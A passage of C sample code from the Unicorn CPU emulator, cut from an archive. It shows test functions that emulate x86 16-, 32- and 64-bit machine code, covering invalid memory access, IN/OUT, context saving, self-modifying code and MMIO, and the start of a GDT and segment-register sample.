printf("Emulate i386 code that write to invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_WRITE, sizeof(X86_CODE32_MEM_WRITE) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // intercept invalid memory events uc_hook_add(uc, &trace3, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_MEM_WRITE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); // read from memory if (!uc_mem_read(uc, 0xaaaaaaaa, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xaaaaaaaa); if (!uc_mem_read(uc, 0xffffffaa, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xffffffaa, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); uc_close(uc); } // emulate code that jump to invalid memory static void test_i386_jump_invalid(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that jumps to invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_JMP_INVALID, sizeof(X86_CODE32_JMP_INVALID) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_JMP_INVALID) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } static void test_i386_inout(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3, trace4; int r_eax = 0x1234; // EAX register int r_ecx = 0x6789; // ECX register printf("Emulate i386 code with IN/OUT instructions\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_INOUT, sizeof(X86_CODE32_INOUT) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // uc IN instruction uc_hook_add(uc, &trace3, UC_HOOK_INSN, hook_in, NULL, 1, 0, UC_X86_INS_IN); // uc OUT instruction uc_hook_add(uc, &trace4, UC_HOOK_INSN, hook_out, NULL, 1, 0, UC_X86_INS_OUT); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INOUT) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); printf(">>> EAX = 0x%x\n", r_eax); printf(">>> ECX = 0x%x\n", r_ecx); uc_close(uc); } // emulate code and save/restore the CPU context static void test_i386_context_save(void) { uc_engine *uc; uc_context *context; uc_err err; int r_eax = 0x1; // EAX register printf("Save/restore CPU context in opaque blob\n"); // initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 8KB memory for this emulation uc_mem_map(uc, ADDRESS, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_INC, sizeof(X86_CODE32_INC) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); // emulate machine code in infinite time printf(">>> Running emulation for the first time\n"); err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // allocate and save the CPU context printf(">>> Saving CPU context\n"); err = uc_context_alloc(uc, &context); if (err) { printf("Failed on uc_context_alloc() with error returned: %u\n", err); return; } err = uc_context_save(uc, context); if (err) { printf("Failed on uc_context_save() with error returned: %u\n", err); return; } // emulate machine code again printf(">>> Running emulation for the second time\n"); err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // restore CPU context err = uc_context_restore(uc, context); if (err) { printf("Failed on uc_context_restore() with error returned: %u\n", err); return; } // now print out some registers printf(">>> CPU context restored. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // modify some registers of the context r_eax = 0xc8; uc_context_reg_write(context, UC_X86_REG_EAX, &r_eax); // and restore CPU context again err = uc_context_restore(uc, context); if (err) { printf("Failed on uc_context_restore() with error returned: %u\n", err); return; } // now print out some registers printf(">>> CPU context restored with modification. Below is the CPU " "context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // free the CPU context err = uc_context_free(context); if (err) { printf("Failed on uc_free() with error returned: %u\n", err); return; } uc_close(uc); } #if 0 static void test_i386_invalid_c6c7(void) { uc_engine *uc; uc_err err; uint8_t codebuf[16] = { 0 }; uint8_t opcodes[] = { 0xc6, 0xc7 }; bool valid_masks[4][8] = { { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, true }, }; int i, j, k; printf("Emulate i386 C6/C7 opcodes\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); for (i = 0; i < 2; ++i) { // set opcode codebuf[0] = opcodes[i]; for (j = 0; j < 4; ++j) { for (k = 0; k < 8; ++k) { // set Mod bits codebuf[1] = (uint8_t) (j << 6); // set Reg bits codebuf[1] |= (uint8_t) (k << 3); // perform validation if (uc_mem_write(uc, ADDRESS, codebuf, sizeof(codebuf))) { printf("Failed to write emulation code to memory, quit!\n"); return; } err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(codebuf), 0, 0); if ((err != UC_ERR_INSN_INVALID) ^ valid_masks[j][k]) { printf("Unexpected uc_emu_start() error returned %u: %s\n", err, uc_strerror(err)); return; } } } } printf(">>> Emulation done.\n"); uc_close(uc); } #endif static void test_x86_64(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3, trace4; int64_t rax = 0x71f3029efd49d41d; int64_t rbx = 0xd87b45277f133ddb; int64_t rcx = 0xab40d1ffd8afc461; int64_t rdx = 0x919317b4a733f01; int64_t rsi = 0x4c24e753a17ea358; int64_t rdi = 0xe509a57d2571ce96; int64_t r8 = 0xea5b108cc2b9ab1f; int64_t r9 = 0x19ec097c8eb618c1; int64_t r10 = 0xec45774f00c5f682; int64_t r11 = 0xe17e9dbec8c074aa; int64_t r12 = 0x80f86a8dc0f6d457; int64_t r13 = 0x48288ca5671c5492; int64_t r14 = 0x595f72f6e4017f6e; int64_t r15 = 0x1efd97aea331cccc; int64_t rsp = ADDRESS + 0x200000; printf("Emulate x86_64 code\n"); // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE64, sizeof(X86_CODE64) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_RSP, &rsp); uc_reg_write(uc, UC_X86_REG_RAX, &rax); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RCX, &rcx); uc_reg_write(uc, UC_X86_REG_RDX, &rdx); uc_reg_write(uc, UC_X86_REG_RSI, &rsi); uc_reg_write(uc, UC_X86_REG_RDI, &rdi); uc_reg_write(uc, UC_X86_REG_R8, &r8); uc_reg_write(uc, UC_X86_REG_R9, &r9); uc_reg_write(uc, UC_X86_REG_R10, &r10); uc_reg_write(uc, UC_X86_REG_R11, &r11); uc_reg_write(uc, UC_X86_REG_R12, &r12); uc_reg_write(uc, UC_X86_REG_R13, &r13); uc_reg_write(uc, UC_X86_REG_R14, &r14); uc_reg_write(uc, UC_X86_REG_R15, &r15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions in the range [ADDRESS, ADDRESS+20] uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code64, NULL, ADDRESS, ADDRESS + 20); // tracing all memory WRITE access (with @begin > @end) uc_hook_add(uc, &trace3, UC_HOOK_MEM_WRITE, hook_mem64, NULL, 1, 0); // tracing all memory READ access (with @begin > @end) uc_hook_add(uc, &trace4, UC_HOOK_MEM_READ, hook_mem64, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE64) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_RAX, &rax); uc_reg_read(uc, UC_X86_REG_RBX, &rbx); uc_reg_read(uc, UC_X86_REG_RCX, &rcx); uc_reg_read(uc, UC_X86_REG_RDX, &rdx); uc_reg_read(uc, UC_X86_REG_RSI, &rsi); uc_reg_read(uc, UC_X86_REG_RDI, &rdi); uc_reg_read(uc, UC_X86_REG_R8, &r8); uc_reg_read(uc, UC_X86_REG_R9, &r9); uc_reg_read(uc, UC_X86_REG_R10, &r10); uc_reg_read(uc, UC_X86_REG_R11, &r11); uc_reg_read(uc, UC_X86_REG_R12, &r12); uc_reg_read(uc, UC_X86_REG_R13, &r13); uc_reg_read(uc, UC_X86_REG_R14, &r14); uc_reg_read(uc, UC_X86_REG_R15, &r15); printf(">>> RAX = 0x%" PRIx64 "\n", rax); printf(">>> RBX = 0x%" PRIx64 "\n", rbx); printf(">>> RCX = 0x%" PRIx64 "\n", rcx); printf(">>> RDX = 0x%" PRIx64 "\n", rdx); printf(">>> RSI = 0x%" PRIx64 "\n", rsi); printf(">>> RDI = 0x%" PRIx64 "\n", rdi); printf(">>> R8 = 0x%" PRIx64 "\n", r8); printf(">>> R9 = 0x%" PRIx64 "\n", r9); printf(">>> R10 = 0x%" PRIx64 "\n", r10); printf(">>> R11 = 0x%" PRIx64 "\n", r11); printf(">>> R12 = 0x%" PRIx64 "\n", r12); printf(">>> R13 = 0x%" PRIx64 "\n", r13); printf(">>> R14 = 0x%" PRIx64 "\n", r14); printf(">>> R15 = 0x%" PRIx64 "\n", r15); uc_close(uc); } static void test_x86_64_syscall(void) { uc_engine *uc; uc_hook trace1; uc_err err; int64_t rax = 0x100; printf("Emulate x86_64 code with 'syscall' instruction\n"); // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE64_SYSCALL, sizeof(X86_CODE64_SYSCALL) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // hook interrupts for syscall uc_hook_add(uc, &trace1, UC_HOOK_INSN, hook_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL); // initialize machine registers uc_reg_write(uc, UC_X86_REG_RAX, &rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE64_SYSCALL) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_RAX, &rax); printf(">>> RAX = 0x%" PRIx64 "\n", rax); uc_close(uc); } static void test_x86_16(void) { uc_engine *uc; uc_err err; uint8_t tmp; int32_t eax = 7; int32_t ebx = 5; int32_t esi = 6; printf("Emulate x86 16-bit code\n"); // Initialize emulator in X86-16bit mode err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 8KB memory for this emulation uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, 0, X86_CODE16, sizeof(X86_CODE16) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &eax); uc_reg_write(uc, UC_X86_REG_EBX, &ebx); uc_reg_write(uc, UC_X86_REG_ESI, &esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, 0, sizeof(X86_CODE16) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); // read from memory if (!uc_mem_read(uc, 11, &tmp, 1)) printf(">>> Read 1 bytes from [0x%x] = 0x%x\n", 11, tmp); else printf(">>> Failed to read 1 bytes from [0x%x]\n", 11); uc_close(uc); } static void test_i386_invalid_mem_read_in_tb(void) { uc_engine *uc; uc_err err; uc_hook trace1; int r_eax = 0x1234; // EAX register int r_edx = 0x7890; // EDX register int r_eip = 0; printf( "Emulate i386 code that read invalid memory in the middle of a TB\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_READ_IN_TB, sizeof(X86_CODE32_MEM_READ_IN_TB) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // Add a dummy callback. uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ, hook_mem_invalid_dummy, NULL, 1, 0); // Let it crash by design. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_MEM_READ_IN_TB) - 1, 0, 0); if (err) { printf("uc_emu_start() failed BY DESIGN with error returned %u: %s\n", err, uc_strerror(err)); } printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); printf(">>> EIP = 0x%x\n", r_eip); if (r_eip != ADDRESS + 1) { printf(">>> ERROR: Wrong PC 0x%x when reading unmapped memory in the " "middle of TB!\n", r_eip); } else { printf(">>> The PC is correct after reading unmapped memory in the " "middle of TB.\n"); } uc_close(uc); } static void test_i386_smc_xor(void) { uc_engine *uc; uc_err err; uint32_t r_edi = ADDRESS; // ECX register uint32_t r_eax = 0xbc4177e6; // EDX register uint32_t result; printf("Emulate i386 code that modfies itself\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 1KB memory for this emulation uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_SMC, sizeof(X86_CODE32_SMC) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); // **Important Note** // // Since SMC code will cause TB regeneration, the XOR in fact would executed // twice (the first execution won't take effect.). Thus, if you would like // to use count to control the emulation, the count should be set to 2. // // err = uc_emu_start(uc, ADDRESS, ADDRESS + 3, 0, 0); err = uc_emu_start(uc, ADDRESS, 0, 0, 2); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf(">>> Emulation done. Below is the result.\n"); uc_mem_read(uc, ADDRESS + 3, (void *)&result, 4); if (result == (0x3ea98b13 ^ 0xbc4177e6)) { printf(">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } else { printf(">>> SMC emulation is wrong. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } uc_close(uc); } static uint64_t mmio_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { printf(">>> Read IO memory at offset 0x%" PRIu64 " with 0x%" PRIu32 " bytes and return 0x19260817\n", offset, size); // The value returned here would be written to ecx. return 0x19260817; } static void mmio_write_callback(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { printf(">>> Write value 0x%" PRIu64 " to IO memory at offset 0x%" PRIu64 " with 0x%" PRIu32 " bytes\n", value, offset, size); return; } static void test_i386_mmio(void) { uc_engine *uc; int r_ecx = 0xdeadbeef; uc_err err; printf("Emulate i386 code that uses MMIO\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 1KB memory for this emulation err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_MMIO_CODE, sizeof(X86_MMIO_CODE) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } err = uc_mmio_map(uc, 0x20000, 0x4000, mmio_read_callback, NULL, mmio_write_callback, NULL); if (err) { printf("Failed on uc_mmio_map() with error returned: %u\n", err); return; } // prepare ecx err = uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); if (err) { printf("Failed on uc_reg_write() with error returned: %u\n", err); return; } err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_MMIO_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); printf(">>> Emulation done. ECX=0x%x\n", r_ecx); uc_close(uc); } static bool test_i386_hook_mem_invalid_cb(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { if (type == UC_MEM_READ_UNMAPPED || type == UC_MEM_WRITE_UNMAPPED) { printf(">>> We have to add a map at 0x%" PRIx64 " before continue execution!\n", address); uc_mem_map(uc, address, 0x1000, UC_PROT_ALL); } // If you really would like to continue the execution, make sure the memory // is already mapped properly! return true; } static void test_i386_hook_mem_invalid(void) { uc_engine *uc; uc_hook hook; // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; char code[] = "\xb8\xef\xbe\xad\xde\xa3\x00\x80\x00\x00\xa1\x00\x00\x01\x00"; uc_err err; printf("Emulate i386 code that triggers invalid memory read/write.\n"); err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } err = uc_mem_write(uc, ADDRESS, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } err = uc_hook_add(uc, &hook, UC_HOOK_MEM_VALID | UC_HOOK_MEM_INVALID, test_i386_hook_mem_invalid_cb, NULL, 1, 0); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(code) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } uc_hook_del(uc, hook); uc_close(uc); } int main(int argc, char **argv, char **envp) { if (argc == 2) { if (!strcmp(argv[1], "-16")) { test_x86_16(); } else if (!strcmp(argv[1], "-32")) { test_miss_code(); printf("===================================\n"); test_i386(); printf("===================================\n"); test_i386_map_ptr(); printf("===================================\n"); test_i386_inout(); printf("===================================\n"); test_i386_context_save(); printf("===================================\n"); test_i386_jump(); printf("===================================\n"); test_i386_loop(); printf("===================================\n"); test_i386_invalid_mem_read(); printf("===================================\n"); test_i386_invalid_mem_write(); printf("===================================\n"); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); } else if (!strcmp(argv[1], "-64")) { test_x86_64(); printf("===================================\n"); test_x86_64_syscall(); } else if (!strcmp(argv[1], "-h")) { printf("Syntax: %s <-16|-32|-64>\n", argv[0]); } } else { test_x86_16(); printf("===================================\n"); test_miss_code(); printf("===================================\n"); test_i386(); printf("===================================\n"); test_i386_map_ptr(); printf("===================================\n"); test_i386_inout(); printf("===================================\n"); test_i386_context_save(); printf("===================================\n"); test_i386_jump(); printf("===================================\n"); test_i386_loop(); printf("===================================\n"); test_i386_invalid_mem_read(); printf("===================================\n"); test_i386_invalid_mem_write(); printf("===================================\n"); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); printf("===================================\n"); test_x86_64(); printf("===================================\n"); test_x86_64_syscall(); printf("===================================\n"); test_i386_invalid_mem_read_in_tb(); printf("===================================\n"); test_i386_smc_xor(); printf("===================================\n"); test_i386_mmio(); printf("===================================\n"); test_i386_hook_mem_invalid(); } return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_x86_32_gdt_and_seg_regs.c����������������������������������������������0000664�0000000�0000000�00000023370�14675241067�0022651�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Sample code to setup a GDT, and use segments. Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include <unicorn/unicorn.h> #include <string.h> #include <assert.h> #include <stdlib.h> #pragma pack(push, 1) struct SegmentDescriptor { union { struct { #if __BYTE_ORDER == __LITTLE_ENDIAN unsigned short limit0; unsigned short base0; unsigned char base1; unsigned char type : 4; unsigned char system : 1; /* S flag */ unsigned char dpl : 2; unsigned char present : 1; /* P flag */ unsigned char limit1 : 4; unsigned char avail : 1; unsigned char is_64_code : 1; /* L flag */ unsigned char db : 1; /* DB flag */ unsigned char granularity : 1; /* G flag */ unsigned char base2; #else unsigned char base2; unsigned char granularity : 1; /* G flag */ unsigned char db : 1; /* DB flag */ unsigned char is_64_code : 1; /* L flag */ unsigned char avail : 1; unsigned char limit1 : 4; unsigned char present : 1; /* P flag */ unsigned char dpl : 2; unsigned char system : 1; /* S flag */ unsigned char type : 4; unsigned char base1; unsigned short base0; unsigned short limit0; #endif }; uint64_t desc; }; }; #pragma pack(pop) #define SEGBASE(d) \ ((uint32_t)((((d).desc >> 16) & 0xffffff) | \ (((d).desc >> 32) & 0xff000000))) #define SEGLIMIT(d) ((d).limit0 | (((unsigned int)(d).limit1) << 16)) /** * Assert that err matches expect */ #define uc_assert_err(expect, err) \ do { \ uc_err __err = err; \ if (__err != expect) { \ fprintf(stderr, "%s", uc_strerror(__err)); \ exit(1); \ } \ } while (0) /** * Assert that err is UC_ERR_OK */ #define uc_assert_success(err) uc_assert_err(UC_ERR_OK, err) /** * Assert that err is anything but UC_ERR_OK * * Note: Better to use uc_assert_err(<specific error>, err), * as this serves to document which errors a function will return * in various scenarios. */ #define uc_assert_fail(err) \ do { \ uc_err __err = err; \ if (__err == UC_ERR_OK) { \ fprintf(stderr, "%s", uc_strerror(__err)); \ exit(1); \ } \ } while (0) #define OK(x) uc_assert_success(x) /******************************************************************************/ static void hook_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { case UC_MEM_WRITE: printf("mem write at 0x%" PRIx64 ", size = %u, value = 0x%" PRIx64 "\n", address, size, value); break; default: break; } } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Executing at 0x%" PRIx64 ", ilen = 0x%x\n", address, size); } // VERY basic descriptor init function, sets many fields to user space sane // defaults static void init_descriptor(struct SegmentDescriptor *desc, uint32_t base, uint32_t limit, uint8_t is_code) { desc->desc = 0; // clear the descriptor desc->base0 = base & 0xffff; desc->base1 = (base >> 16) & 0xff; desc->base2 = base >> 24; if (limit > 0xfffff) { // need Giant granularity limit >>= 12; desc->granularity = 1; } desc->limit0 = limit & 0xffff; desc->limit1 = limit >> 16; // some sane defaults desc->dpl = 3; desc->present = 1; desc->db = 1; // 32 bit desc->type = is_code ? 0xb : 3; desc->system = 1; // code or data } /* static void hex_dump(unsigned char *ptr, unsigned int len) { int i; for (i = 0; i < len; i++) { if (i != 0 && (i & 0xf) == 0) { fprintf(stderr, "\n"); } fprintf(stderr, "%02hhx", ptr[i]); } fprintf(stderr, "\n"); } */ static void gdt_demo(void) { uc_engine *uc; uc_hook hook1, hook2; uc_err err; uint8_t buf[128]; uc_x86_mmr gdtr; int i; /* bits 32 push dword 0x01234567 push dword 0x89abcdef mov dword [fs:0], 0x01234567 mov dword [fs:4], 0x89abcdef */ const uint8_t code[] = "\x68\x67\x45\x23\x01\x68\xef\xcd\xab\x89\x64\xc7\x05\x00\x00\x00\x00" "\x67\x45\x23\x01\x64\xc7\x05\x04\x00\x00\x00\xef\xcd\xab\x89"; const uint64_t code_address = 0x1000000; const uint64_t stack_address = 0x120000; const uint64_t gdt_address = 0xc0000000; const uint64_t fs_address = 0x7efdd000; struct SegmentDescriptor *gdt = (struct SegmentDescriptor *)calloc( 31, sizeof(struct SegmentDescriptor)); int r_esp = (int)stack_address + 0x1000; // initial esp int r_cs = 0x73; int r_ss = 0x88; // ring 0 int r_ds = 0x7b; int r_es = 0x7b; int r_fs = 0x83; gdtr.base = gdt_address; gdtr.limit = 31 * sizeof(struct SegmentDescriptor) - 1; init_descriptor(&gdt[14], 0, 0xfffff000, 1); // code segment init_descriptor(&gdt[15], 0, 0xfffff000, 0); // data segment init_descriptor(&gdt[16], 0x7efdd000, 0xfff, 0); // one page data segment simulate fs init_descriptor(&gdt[17], 0, 0xfffff000, 0); // ring 0 data 